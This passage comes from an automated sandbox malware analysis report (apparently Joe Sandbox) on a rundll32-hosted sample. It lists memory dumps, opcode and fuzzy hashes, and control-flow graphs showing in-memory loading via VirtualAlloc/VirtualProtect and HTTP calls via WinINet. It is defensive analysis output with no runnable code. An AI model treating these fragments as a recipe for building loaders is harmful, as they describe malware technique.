                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_3_29f3b7a0000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 611503c2f2b608366220324c20f94816b5761d40c9c053a388f9cbb19c4f0105
                                                                                                                                                                                                                            • Instruction ID: af0ab48d7d17c9110e02221fb5d531b79efa5379ad74c5b37b7098bdcc57f71e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 611503c2f2b608366220324c20f94816b5761d40c9c053a388f9cbb19c4f0105
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36F0B470A28F444BC744AF2C884EA7533D2FBE8646F54463EE448C7361CB35E8428B83
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 3a87759f1dbb7da0b31a2215c550786eb7d616866bd4ea5bb0906d9c5e547a0c
                                                                                                                                                                                                                            • Instruction ID: d84466c778245787f7d2b0df6ccf95e0f148e985b154a7e242bd8c1b128bc74f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a87759f1dbb7da0b31a2215c550786eb7d616866bd4ea5bb0906d9c5e547a0c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9D05E7248DA584DE6609A98B4473F4B3D0E780324F40482EC18CC1143D63E40464706

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 0 29f3b752050-29f3b75209a call 29f3b751340 3 29f3b7520a3-29f3b7520bd 0->3 4 29f3b75209c-29f3b75209e 0->4 6 29f3b7520bf-29f3b7520cc SetLastError 3->6 7 29f3b7520d1-29f3b7520fa call 29f3b751340 3->7 5 29f3b752640-29f3b752647 4->5 6->5 10 29f3b752103-29f3b75212a 7->10 11 29f3b7520fc-29f3b7520fe 7->11 12 29f3b75212c-29f3b752139 SetLastError 10->12 13 29f3b75213e-29f3b75214c 10->13 11->5 12->5 14 29f3b752160-29f3b75216d 13->14 15 29f3b75214e-29f3b75215b SetLastError 13->15 16 29f3b75216f-29f3b75217c SetLastError 14->16 17 29f3b752181-29f3b7521b1 14->17 15->5 16->5 18 29f3b7521cb-29f3b7521d8 17->18 19 29f3b75222b-29f3b752286 GetNativeSystemInfo 18->19 20 29f3b7521da-29f3b7521e3 18->20 23 29f3b752288-29f3b752295 SetLastError 19->23 24 29f3b75229a-29f3b7522c5 VirtualAlloc 19->24 21 29f3b7521e5-29f3b7521fa 20->21 22 29f3b7521fc-29f3b75220e 20->22 25 29f3b752213-29f3b75221d 21->25 22->25 23->5 26 29f3b7522ff-29f3b752324 GetProcessHeap HeapAlloc 24->26 27 29f3b7522c7-29f3b7522eb VirtualAlloc 24->27 30 29f3b75221f-29f3b752224 25->30 31 29f3b752229 25->31 28 29f3b752326-29f3b752346 VirtualFree SetLastError 26->28 29 29f3b75234b-29f3b752369 26->29 27->26 32 29f3b7522ed-29f3b7522fa SetLastError 27->32 28->5 33 29f3b752375 29->33 34 29f3b75236b-29f3b752373 29->34 30->31 31->18 32->5 36 29f3b75237d-29f3b7523fe call 29f3b751340 33->36 34->36 39 29f3b752400 36->39 40 29f3b75240a-29f3b7524a7 VirtualAlloc call 29f3b751120 call 29f3b751380 36->40 41 29f3b75262c-29f3b75263e call 29f3b7528e0 39->41 47 29f3b7524ac-29f3b7524ae 40->47 41->5 48 29f3b7524b0 47->48 49 29f3b7524ba-29f3b7524e3 47->49 48->41 50 29f3b7524e5-29f3b752507 call 29f3b751ab0 49->50 51 29f3b752509-29f3b75250e 49->51 53 29f3b752515-29f3b752529 call 29f3b751c80 50->53 51->53 57 
29f3b752535-29f3b752549 call 29f3b751790 53->57 58 29f3b75252b 53->58 61 29f3b752555-29f3b752569 call 29f3b7519f0 57->61 62 29f3b75254b 57->62 58->41 65 29f3b752575-29f3b752581 61->65 66 29f3b75256b 61->66 62->41 67 29f3b752618-29f3b75261d 65->67 68 29f3b752587-29f3b752590 65->68 66->41 71 29f3b752625-29f3b75262a 67->71 69 29f3b752592-29f3b7525d8 68->69 70 29f3b7525f7-29f3b752612 68->70 74 29f3b7525da-29f3b7525e5 SetLastError 69->74 75 29f3b7525e9-29f3b7525f5 69->75 72 29f3b752616 70->72 71->5 71->41 72->71 74->41 75->72
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B750000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2578591825.0000029F3B796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b750000_rundll32.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1452528299-0

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 151 29f3b8e7830-29f3b8e7883 152 29f3b8e788a-29f3b8e7892 InternetOpenW 151->152 153 29f3b8e7885-29f3b8e7888 151->153 154 29f3b8e7af9-29f3b8e7afd 152->154 155 29f3b8e7898-29f3b8e78d7 InternetConnectW 152->155 153->152 156 29f3b8e7aff-29f3b8e7b0c 154->156 155->154 157 29f3b8e78dd-29f3b8e792b HttpOpenRequestW 155->157 158 29f3b8e7b0e-29f3b8e7b11 InternetCloseHandle 156->158 159 29f3b8e7b17-29f3b8e7b1a 156->159 157->156 160 29f3b8e7931-29f3b8e793b 157->160 158->159 163 29f3b8e7b1c-29f3b8e7b1d 159->163 164 29f3b8e7b25-29f3b8e7b28 159->164 161 29f3b8e793d-29f3b8e7945 160->161 162 29f3b8e7990-29f3b8e79ab 160->162 161->162 165 29f3b8e7947-29f3b8e798b call 29f3b912750 * 2 161->165 162->156 174 29f3b8e79b1-29f3b8e79ba 162->174 163->164 166 29f3b8e7b2a-29f3b8e7b2b 164->166 167 29f3b8e7b33-29f3b8e7b3b 164->167 165->162 166->167 170 29f3b8e7b41-29f3b8e7b4b 167->170 171 29f3b8e7bd0-29f3b8e7be3 167->171 172 29f3b8e7b4d-29f3b8e7b54 call 29f3b911230 170->172 173 29f3b8e7b62-29f3b8e7b73 170->173 172->173 185 29f3b8e7b56-29f3b8e7b60 call 29f3b90b4e0 172->185 179 29f3b8e7b7a-29f3b8e7b8a call 29f3b8ecb60 173->179 180 29f3b8e7b75-29f3b8e7b78 173->180 177 29f3b8e79bc-29f3b8e79de call 29f3b911270 HttpSendRequestA 174->177 178 29f3b8e79e6-29f3b8e7a0a 174->178 177->156 191 29f3b8e79e4-29f3b8e7a16 177->191 194 29f3b8e7a0c 178->194 192 29f3b8e7b8c-29f3b8e7bb8 call 29f3b8ea050 call 29f3b90b4e0 179->192 193 29f3b8e7bba-29f3b8e7bce call 29f3b911410 179->193 180->171 180->179 185->171 202 29f3b8e7a18-29f3b8e7a1f call 29f3b90b4e0 191->202 203 29f3b8e7a24-29f3b8e7a3b call 29f3b90b4c0 191->203 192->171 193->171 193->185 194->177 202->203 209 29f3b8e7a3f-29f3b8e7a5b InternetQueryDataAvailable 203->209 210 29f3b8e7ae3-29f3b8e7af7 call 29f3b90b4e0 209->210 211 
29f3b8e7a61-29f3b8e7a69 209->211 210->158 211->210 213 29f3b8e7a6b-29f3b8e7a7e 211->213 213->210 216 29f3b8e7a80-29f3b8e7a86 213->216 216->210 217 29f3b8e7a88-29f3b8e7a96 216->217 218 29f3b8e7aac-29f3b8e7aaf call 29f3b90b4c0 217->218 219 29f3b8e7a98-29f3b8e7aaa 217->219 222 29f3b8e7ab4-29f3b8e7ade call 29f3b9044a0 218->222 219->222 222->209
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$HttpOpenRequest$AvailableCloseConnectDataFreeHandleHeapQuerySend
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3768145577-0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000003.1448734895.0000029F3B7A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B7A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_3_29f3b7a0000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: 0$@$@$`
                                                                                                                                                                                                                            • API String ID: 0-307318802
                                                                                                                                                                                                                            • Opcode ID: 790f92f7944892e3d38ff7d826f4987b9e3c0bb28676424d5e8019a2330f5ae1
                                                                                                                                                                                                                            • Instruction ID: dfad4ec15d4a512eb4da1bdb9141e9cbcdf1bd8384b6b2e90b728433c483e8fd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 790f92f7944892e3d38ff7d826f4987b9e3c0bb28676424d5e8019a2330f5ae1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6B1837061CB888FD7A4EF18D445BAAB7E0FB98351F104A6EE49DC3291DB34D944CB86
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000003.1448734895.0000029F3B7A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B7A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_3_29f3b7a0000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                                                                                            • Opcode ID: 9457dfe6ec60ebb388675859c3b208fc461dcabcf6edda219dbca694cf0c5acf
                                                                                                                                                                                                                            • Instruction ID: 7714cd34066bacaeef50d2c06ffe5aca3cef18594e00d5d22bd8fd5bdff33ca1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9457dfe6ec60ebb388675859c3b208fc461dcabcf6edda219dbca694cf0c5acf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5FB1B63121CB488FDB94EF1CC889BAAB7E1FB98311F50466DE499C7251DB34E845CB92

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 310 29f3b7515e0-29f3b7515fc 311 29f3b7515fe-29f3b751603 310->311 312 29f3b751608-29f3b751617 310->312 313 29f3b751784-29f3b751788 311->313 314 29f3b75168c-29f3b75169b 312->314 315 29f3b751619-29f3b75162a 312->315 316 29f3b75169d-29f3b7516a5 314->316 317 29f3b7516a7 314->317 318 29f3b751682-29f3b751687 315->318 319 29f3b75162c-29f3b751635 315->319 320 29f3b7516af-29f3b7516c6 316->320 317->320 318->313 321 29f3b751664-29f3b75167c VirtualFree 319->321 322 29f3b751637-29f3b75164a 319->322 323 29f3b7516d2 320->323 324 29f3b7516c8-29f3b7516d0 320->324 321->318 322->321 325 29f3b75164c-29f3b751662 322->325 326 29f3b7516da-29f3b7516f1 323->326 324->326 325->318 325->321 327 29f3b7516f3-29f3b7516fb 326->327 328 29f3b7516fd 326->328 329 29f3b751705-29f3b751747 327->329 328->329 330 29f3b751755-29f3b751779 VirtualProtect 329->330 331 29f3b751749-29f3b751751 329->331 332 29f3b75177f 330->332 333 29f3b75177b-29f3b75177d 330->333 331->330 332->313 333->313
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B750000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2578591825.0000029F3B796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b750000_rundll32.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                                                                                                            • Opcode ID: 75ce38d37ca8cf5b7d06ded007de5ea175a415d9990679de99291eeea22f5aae
                                                                                                                                                                                                                            • Instruction ID: 8da4a63b7b90e5d1fb6f3846650977fd5a92093893c62ed5bf8d6f6b5c0f71a4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75ce38d37ca8cf5b7d06ded007de5ea175a415d9990679de99291eeea22f5aae
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C51BC76318784C7EB90DB1AE59472AB7A1F3C8B46F050066EA9EC7B54DB7CD940CB04

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B750000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2578591825.0000029F3B796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b750000_rundll32.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                            • Opcode ID: 816fc88231aa2467bf2252115963d1d14762f6c5c40f282537df11a36abcc1ab
                                                                                                                                                                                                                            • Instruction ID: 25e59f6ef61218098323f6b00e4d0635cb53af7e9f88f279cb0720bb1f0eadc4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 816fc88231aa2467bf2252115963d1d14762f6c5c40f282537df11a36abcc1ab
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C51EC76718B8486CBA0DB15E59472AB7A1F7C8BD9F105126EE8E83B68DB3CC540CF04

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateMutex
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1964310414-0
                                                                                                                                                                                                                            • Opcode ID: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                                                                                                                                                                            • Instruction ID: 4f3a3cda15305d8e7f2df8fcff4d165067012b667d3fc1fb32fca9d29fb4f661
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0E12171408A4D8FE751EF14E895BE6B7F4F768340F20067FE84AC2261DB389245CB86

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 498 29f3b90b4e0-29f3b90b4ee 499 29f3b90b4f0-29f3b90b505 498->499 500 29f3b90b523-29f3b90b52f 498->500 499->500 502 29f3b90b507-29f3b90b51d call 29f3b904ce0 RtlFreeHeap 499->502 502->500
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                                                                            • Opcode ID: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                                                                                                                                                                            • Instruction ID: 0461ee7bc1588e739af02a26735861416afdb6a57617583cd87e0359e5c20d23
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2F03030311A088FFB98E7BAACD877537E2FB9D346F4480A4A405C6294DB7CD841C705

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 505 273f414d0-273f414dc 506 273f414e0-273f414e7 SleepEx 505->506 506->506
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2567889790.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2567827324.0000000273F40000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2567889790.0000000273F85000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                                            • Opcode ID: 490134546b41fa5f3525d4fc16026bee51ec6a607ddd3dfaa8bb0cc5ac4d8099
                                                                                                                                                                                                                            • Instruction ID: 0bf00bace8f2674ea540bcf736f3f2282d979a864102f6c7b7d6f84e33ec7844
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 490134546b41fa5f3525d4fc16026bee51ec6a607ddd3dfaa8bb0cc5ac4d8099
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06B09B14F04594C7E2255791B44D7699610B74FBD1F249451C55D13755851455425702

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 507 29f3b7511c0-29f3b7511f0 VirtualAlloc
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B750000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2578591825.0000029F3B796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b750000_rundll32.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                            • Opcode ID: a26db5a74adc6119d098d68705d28c1916c0da013186a83d7531f391c9707544
                                                                                                                                                                                                                            • Instruction ID: 69e6a8db7854563c547352777915e35218122c34ea3a254b3cfa8abb407f2512
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a26db5a74adc6119d098d68705d28c1916c0da013186a83d7531f391c9707544
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78D052B2B0868083CB289B20E81060A7B60F388744F904029EA8D83B68CA3EC2128F04
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2567889790.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2567827324.0000000273F40000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2567889790.0000000273F85000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: QueryVirtual
                                                                                                                                                                                                                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                                                                                                                            • API String ID: 1804819252-1534286854
                                                                                                                                                                                                                            • Opcode ID: 0cce06267e1579f90ae27719d32f235d794723324326edd454bf682594529e94
                                                                                                                                                                                                                            • Instruction ID: 663189738c40874af7135dc25b0b982f4eec5aa8fa6ad61ed8319b582aa1f326
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cce06267e1579f90ae27719d32f235d794723324326edd454bf682594529e94
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB41AF72F08F4482EB14DB51E8497DA77A0F789BE0F644220DA4D07BA5EB38C685E742
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B750000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2578591825.0000029F3B796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b750000_rundll32.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                                                            • Opcode ID: 50d4aa64397910f34370dcdd3f25db7b3cd1b44d2d627c561aa8e3d7ca6c4d4e
                                                                                                                                                                                                                            • Instruction ID: 83e33ab33621e98cd89c4c14678da7dc837745e988a6e748a7efd3b50fa205b4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 50d4aa64397910f34370dcdd3f25db7b3cd1b44d2d627c561aa8e3d7ca6c4d4e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A510C32A18B8486DBE4DB19E55432A77A0F788B85F10046AEB9EC7764DB3CD444CB08
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2567889790.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2567827324.0000000273F40000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2567889790.0000000273F85000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Sleep_amsg_exit
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1015461914-0
                                                                                                                                                                                                                            • Opcode ID: 1aa7096d3279892f89bb6938d1e8f798873b932fab0900364294d29769eafb3e
                                                                                                                                                                                                                            • Instruction ID: b36ed253b1f92ff08f278adfa0ead6049e2a2874eebc081211355efa6209b103
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1aa7096d3279892f89bb6938d1e8f798873b932fab0900364294d29769eafb3e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08417C31E0CA4885F765DB1AEC497AA2395B784BE4F744025DE0C87FA1EE28CA40B343
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B750000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2578591825.0000029F3B796000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b750000_rundll32.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLastRead
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4100373531-0
                                                                                                                                                                                                                            • Opcode ID: 5e3dd03f4e36ac629c9e35720315601d05ef0c3755c38ff15dc0a5ec62299b24
                                                                                                                                                                                                                            • Instruction ID: 3d679a1340fa1630a6e2a2fc22428c8b25ac778018e1c6034a5559e3e6c657e5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e3dd03f4e36ac629c9e35720315601d05ef0c3755c38ff15dc0a5ec62299b24
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C91AF36319B8486DBA0DB09E45436AB7B0F7C8B95F504166EA9E83B64DF3DC484CB04

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:11.9%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                            Signature Coverage:2.8%
                                                                                                                                                                                                                            Total number of Nodes:869
                                                                                                                                                                                                                            Total number of Limit Nodes:11
